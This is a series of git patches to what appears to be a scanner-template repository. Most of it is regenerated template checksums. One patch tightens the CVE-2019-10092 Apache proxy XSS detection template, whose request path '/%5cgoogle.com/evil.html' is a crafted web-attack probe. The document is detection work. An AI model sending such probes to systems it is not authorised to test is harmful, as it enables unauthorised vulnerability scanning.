17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Fri, 19 Jul 2024 11:52:48 +0200 Subject: [PATCH 1449/1841] Fewer FP in the Apache XSS template --- http/cves/2019/CVE-2019-10092.yaml | 7 ++++++- http/exposed-panels/woodwing-panel.yaml | 2 +- 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 9eaacc6e7c..ec8151ba45 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -37,8 +37,13 @@ http: path: - '{{BaseURL}}/%5cgoogle.com/evil.html' + matchers-condition: and + matchers: + - type: word + words: + - "Proxy Error" - type: word words: - "" -# digest: 4a0a00473045022100bfe2eb7f8a4f95d91a420f7ad97b449eb4a6d0f5943939f24271168a88e3a48102202e82f70bff457ab6443cf8b75fcd733564ec1223feacb6d86ba85e98c95a4fc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bfe2eb7f8a4f95d91a420f7ad97b449eb4a6d0f5943939f24271168a88e3a48102202e82f70bff457ab6443cf8b75fcd733564ec1223feacb6d86ba85e98c95a4fc2:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/woodwing-panel.yaml b/http/exposed-panels/woodwing-panel.yaml index 60333df251..49faecde3a 100644 --- a/http/exposed-panels/woodwing-panel.yaml +++ b/http/exposed-panels/woodwing-panel.yaml @@ -33,4 +33,4 @@ http: group: 1 regex: - 'v([0-9.]+\s+Build\s+[0-9]+)' -# digest: 490a00463044022001a1c753049c41a5a0bcc80814014afa41fe28d5baa2b4a3f631f0d1152b46ee022074d12ded239fcb6dd5b5738c61de27286e5b4a705c65ef0bb69fdb4e45da4554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022001a1c753049c41a5a0bcc80814014afa41fe28d5baa2b4a3f631f0d1152b46ee022074d12ded239fcb6dd5b5738c61de27286e5b4a705c65ef0bb69fdb4e45da4554:922c64590222798bb761d5b6d8e72950 From c13f418280e64ea5bf6037b69446ab97d85819a9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Fri, 19 Jul 2024 11:53:33 +0200 Subject: [PATCH 1450/1841] . --- http/exposed-panels/woodwing-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/woodwing-panel.yaml b/http/exposed-panels/woodwing-panel.yaml index 49faecde3a..60333df251 100644 --- a/http/exposed-panels/woodwing-panel.yaml +++ b/http/exposed-panels/woodwing-panel.yaml @@ -33,4 +33,4 @@ http: group: 1 regex: - 'v([0-9.]+\s+Build\s+[0-9]+)' -# digest: 490a00463044022001a1c753049c41a5a0bcc80814014afa41fe28d5baa2b4a3f631f0d1152b46ee022074d12ded239fcb6dd5b5738c61de27286e5b4a705c65ef0bb69fdb4e45da4554:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022001a1c753049c41a5a0bcc80814014afa41fe28d5baa2b4a3f631f0d1152b46ee022074d12ded239fcb6dd5b5738c61de27286e5b4a705c65ef0bb69fdb4e45da4554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b8211150716d42298624cb0fe99874ab82f274b1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 19 Jul 2024 11:26:54 +0000 Subject: [PATCH 1452/1841] Auto Generated Templates Checksum [Fri Jul 19 11:26:54 UTC 2024] :robot: --- templates-checksum.txt | 406 ++++++++++++++++++++--------------------- 1 file changed, 203 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c9788d634c..4484c65fb3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1409,7 +1409,7 @@ http/cves/2017/CVE-2017-12617.yaml:b6237fb4274a188b1f9ad448e320821a8ea88d79 http/cves/2017/CVE-2017-12629.yaml:c75d842f4374f7ea0aa974ae125618cd1d15248c http/cves/2017/CVE-2017-12635.yaml:39fb356e37aa76522032d44a91bd9f37ac477b70 http/cves/2017/CVE-2017-12637.yaml:add753669b23f66172a951bb76ac9749967b1f72 -http/cves/2017/CVE-2017-12794.yaml:f7f231965db8de81b24e4b0780951356f5cf530d +http/cves/2017/CVE-2017-12794.yaml:e4ff434ad02059a52877d3240e99b57fbb580d55 http/cves/2017/CVE-2017-14135.yaml:2c9bcf7d7ce6e624fe9d3c1c62751f76c28e999d http/cves/2017/CVE-2017-14186.yaml:1884d55d9aa8671e341f7076a11a68e3fc8fba4a http/cves/2017/CVE-2017-14524.yaml:40770e458708602b1efdb5b38b10272db1d4423b @@ -1786,7 +1786,7 @@ http/cves/2019/CVE-2019-6340.yaml:579b3ac2d69aab2fc2e9d65d18c010bfd5b9e9dc http/cves/2019/CVE-2019-6715.yaml:1462b82ac15f5475e25a1c70be0638512af43b0e http/cves/2019/CVE-2019-6799.yaml:b203bd17d30b9d7e352ceca21844491e6f33dea6 http/cves/2019/CVE-2019-6802.yaml:ded913b5a2ab640125f6e866e8b731d04c8b47a4 -http/cves/2019/CVE-2019-7139.yaml:906c9b2571a38b91b52cc59aa12ffd78d05232ed +http/cves/2019/CVE-2019-7139.yaml:5e44b9de96e89b6b25122d212340b801250eab82 http/cves/2019/CVE-2019-7192.yaml:666b80bc55b3a523dcfcbdd3b31e22d53888a6f3 http/cves/2019/CVE-2019-7219.yaml:066161828bddf3fad9c338d9ab9f902431f9ad00 http/cves/2019/CVE-2019-7238.yaml:6fb130fbe23c11eba5b3ce1985fde0165f3914ca @@ -7305,229 +7305,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:a31c9e2fb29bf2c8ce8b574401319eab37dc825c +http/technologies/wordpress/plugins/add-to-any.yaml:08e9d5c83f6fbdff59660e7bacdc629f51d648de +http/technologies/wordpress/plugins/admin-menu-editor.yaml:047daa5a2d53cffa3e6c60ea91b1d87a52eb1b37 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:277ccfca6531639bddaa1e090df6306a94ec369c +http/technologies/wordpress/plugins/akismet.yaml:2dcc2ed3c33652a97fad557f3c6622ee2444b064 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:09b843e7ef310e71d4fffddce8e85ad2485fb968 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:843b1503621e119bd1fa42a4e5ca2d853e0c0dd4 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:c859faf966ad0bacf309fe184c6431f556514ae0 +http/technologies/wordpress/plugins/amp.yaml:0fa2b1a55317b5e7a53923227a3c4757d1badef4 +http/technologies/wordpress/plugins/antispam-bee.yaml:ed5c4ce626e936807440bd11ddbc37cc48fdd628 +http/technologies/wordpress/plugins/astra-sites.yaml:34aeb211c7bea0a547eb9d1b88717cef38759e10 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:da5a376802ba14d1f27f1e84b42528cdcb87c0e8 +http/technologies/wordpress/plugins/backwpup.yaml:2310fa46053b1742805817e6709524b2e51b6cef +http/technologies/wordpress/plugins/better-search-replace.yaml:806a0b6cf1e2619702243b378cc709b62ae9e457 +http/technologies/wordpress/plugins/better-wp-security.yaml:c92bbf19949983c9add136bfd039cd860d14aaf4 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:f10a1ee09c6b331d96040e43083fb4469ab3dd32 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:8f00bc8c9f1d51e7116160043080c9c7a5a0f83b +http/technologies/wordpress/plugins/breeze.yaml:85865499416accc7a188b0acc66604c991deeaf1 +http/technologies/wordpress/plugins/broken-link-checker.yaml:83f275c4773f4ed966691a5a21b20c2bd0372a9a +http/technologies/wordpress/plugins/chaty.yaml:410c0f850db78bf4193f044182be34b10612aa3d +http/technologies/wordpress/plugins/child-theme-configurator.yaml:15bfe8f5a80178216fb475cb2f216f3d17f5fa61 +http/technologies/wordpress/plugins/classic-editor.yaml:6e4cae344caaa8c1385aed27013f71415549ad27 +http/technologies/wordpress/plugins/classic-widgets.yaml:647eff5c7fe338339fa9bb802e1504a98e60ce79 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:34cee0dc8321f79ce8e8ed9ad7498743aa23a7fa http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:21e6bdeb7c14a49e0ac3f7182a52463a0fd66e88 +http/technologies/wordpress/plugins/coblocks.yaml:ebe56ad2cc03667193338f50d4a7ce51f1ce6735 +http/technologies/wordpress/plugins/code-snippets.yaml:bed4cc250a7faf6c65f0a682c48756c1e0f23428 +http/technologies/wordpress/plugins/coming-soon.yaml:424d4e5859eee04cbf378f13d0c6fb98a807449f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:0b7510b0b7612c1b6d135a297e003e0fb27bdcc8 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:604a7f78b3ebc99e356802c9763bd44c25754151 +http/technologies/wordpress/plugins/contact-form-7.yaml:5af315b63c443049ff8d258ff20b91b9e67d7d32 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:22c2b6a76dc30b704acafbcf69c714e72359f011 +http/technologies/wordpress/plugins/cookie-law-info.yaml:8b93fb8e6985a29f47c96db953d97c78f69c2354 +http/technologies/wordpress/plugins/cookie-notice.yaml:743ae53146418100ca1b8f2ad0eac48c5e15a190 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:188e32bce8e0d2129d767921e547b15ebee463e2 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:7d4d7103653903b49113c2ee606482c43638a1c1 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:36d09aef030cec3b87f3c4ca55dbe78a107dc6d3 +http/technologies/wordpress/plugins/custom-css-js.yaml:203418b1d93a068726025698d79f89a5c36c7a5e +http/technologies/wordpress/plugins/custom-fonts.yaml:030f7a495e82fb2ac8c696ead3baf8c25076de9f +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:428485f27840c6d1c59c594b1a87b7fcf3dd7dc2 +http/technologies/wordpress/plugins/disable-comments.yaml:79c21c000baf1e4e2a36d234b49e5a444386fe02 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:4ed42efa0b50c6d6e23fa8249c4908ac07f1f94f +http/technologies/wordpress/plugins/duplicate-page.yaml:b0e3a102268b52f33c0747117e6e32c10ae43ab2 +http/technologies/wordpress/plugins/duplicate-post.yaml:cda223b0928379b71c59a334b1d632c2fe8b133d +http/technologies/wordpress/plugins/duplicator.yaml:46271d2343141c81700b70d12ca713a52f6d08fb +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:3b8e0f59ee24f71c0e16927089d026d1a5dbc471 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:26efd1dad998fd5175296c96e6f2337240ba262c +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:783d8033d0eff4faa4004fc619faf2b270c8facf +http/technologies/wordpress/plugins/elementor.yaml:d1302f698b72df3594c68f8b391f9139ef92d5df +http/technologies/wordpress/plugins/elementskit-lite.yaml:f1d6cfe3af463cf67229d7a34397c6cbf1a480dc +http/technologies/wordpress/plugins/enable-media-replace.yaml:3627035f28863bd25190cacd72ee7bf5135cf0dd +http/technologies/wordpress/plugins/envato-elements.yaml:f52201ec6db5af8698ec5416c52e13b26351f013 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:c7ca1513d316ddcf2a80bed6a8e3bb4d51778a5e +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:d0cec3bcf9974030801f81a82656924517ed4474 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:cd3a7f1b290ed20e858cb4fbbdd2dec2bcda6449 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:69b623cef87d92e852bde520546dc64b363d8d83 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:133364b8b53418697555657b0c2076ea18b7fcff +http/technologies/wordpress/plugins/flamingo.yaml:9a3a395edbb1364833d90e9e7d1d4fae1a7ee63b +http/technologies/wordpress/plugins/fluentform.yaml:992e083aea7f95cbd6810e2b7bbdc73e0f0b8515 +http/technologies/wordpress/plugins/font-awesome.yaml:899cc5f8cdbfc3f86787f39a573ab19736bb4369 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:1420bfa49545997ceacc584b02a095502841eb0b +http/technologies/wordpress/plugins/formidable.yaml:e6800633962a236a55ddfa99cf0fe42f17c6a686 +http/technologies/wordpress/plugins/forminator.yaml:16ba1bce069418e20298b190c24442a49e39a676 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:76e7dec09669a199d265d917d5599a3f2ce8d0b5 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:419dd4e3d91d51062a426bde4eaec8bab80074a5 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8e9915e027e64713d4a3887535b807cdb642b089 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:075713d44c93b8252dc16ee1e2733f1bf80bce8a +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:bb55adb72c4d3181193ea44ff0c04c13100e4347 +http/technologies/wordpress/plugins/google-site-kit.yaml:bce5b7eb77bba0617abd7d9832fb4e45a0358e07 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:82137dbac95c56182c5871ea8861bf5a9a95af6d +http/technologies/wordpress/plugins/gtranslate.yaml:d2866466e06e9a82eeb6d861a85ad65eb0988077 +http/technologies/wordpress/plugins/gutenberg.yaml:d62c2430817c712e936498d3f433c4dc95add79c +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8ee62530caf9364fb46229e19385a4f06837e5a4 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:3d717cf9c08ee27eefd1e5be8b33e8cfb3cca624 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:6297498608cd4317485163500c8a9ebfca3001fe +http/technologies/wordpress/plugins/header-footer.yaml:6284231312e9df879da2442fbb5b07a6783ddd26 +http/technologies/wordpress/plugins/health-check.yaml:d55abe49aec658507c6ed24168dee5bf9b7a6bea +http/technologies/wordpress/plugins/hello-dolly.yaml:753b37813fe8ed8e0d1c25b3936e9358c3bfcd32 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:4e11e73ae1c895b093dd6b83deb6d751389ba9d6 +http/technologies/wordpress/plugins/hostinger.yaml:ea3d2519e3cc74a99e2afa954253f33686da773c +http/technologies/wordpress/plugins/image-optimization.yaml:8bea33bb6974f71a011f3a0136aaf58080991aba +http/technologies/wordpress/plugins/imagify.yaml:e3e854771fa6bc678559bb0da6d2ebdb2b669882 +http/technologies/wordpress/plugins/imsanity.yaml:0030b3ae17a5a31b0cad0debfaf35e288d2af360 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:549d9b2d25ad8f8991fe3e94501d9cead4010d78 +http/technologies/wordpress/plugins/instagram-feed.yaml:c3135e6cb4e2707e6adc08a116a38ebdb97602d6 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:59a7dcf76423a08121100a581ef219440a47a0c8 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:74daa7d6a5a28d0dab9a9f414cd378c7ceabd353 +http/technologies/wordpress/plugins/jetpack.yaml:ed7ba10ac1b60b52add74d359003b67f0eff0d98 +http/technologies/wordpress/plugins/kadence-blocks.yaml:0d16247b1b9ebf86bfc50f70ae0f84d5c67bfc1d +http/technologies/wordpress/plugins/kirki.yaml:62227be51544befc56db5d3f74e8204f9c27e177 +http/technologies/wordpress/plugins/leadin.yaml:c60b9182b5a3734078b68355f15bd678e09c0009 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:c862e9d2161e76cfae6385d069621df4f9e23a34 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:62c528490ba6485456f6a0d0b416665a8c505df5 +http/technologies/wordpress/plugins/litespeed-cache.yaml:414e46d61fa1465d10896636d64d32c371627eae +http/technologies/wordpress/plugins/loco-translate.yaml:98c95581df3a282266e734992c9602673d6d83bf +http/technologies/wordpress/plugins/loginizer.yaml:569e9a8b8584d35c98145c8a850f124303815d72 http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 